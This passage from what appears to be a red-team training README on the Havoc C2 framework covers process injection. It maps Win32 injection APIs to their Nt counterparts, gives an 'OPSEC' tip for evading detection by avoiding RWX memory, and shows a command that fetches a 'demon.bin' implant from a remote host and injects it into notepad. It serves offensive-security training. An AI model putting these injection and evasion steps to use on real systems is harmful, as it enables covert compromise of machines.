WesleyWong420/RedTeamOps-Havoc-101/README.md

 | WriteProcessMemory | NtWriteVirtualMemory |
 | VirtualProtectEx   | NtProtectVirtualMemory |
 | CreateRemoteThread | NtCreateThreadEx |

-**OPSEC Tips:** Allocating RWX region is a major outlier for detection as programs will rarely have memory region of RWX.
-Always allocate RW then flip it to RX.
 ```
 C:\>Clicker.exe -u http://192.168.231.128:9090/demon.bin -t notepad -p 4160 -k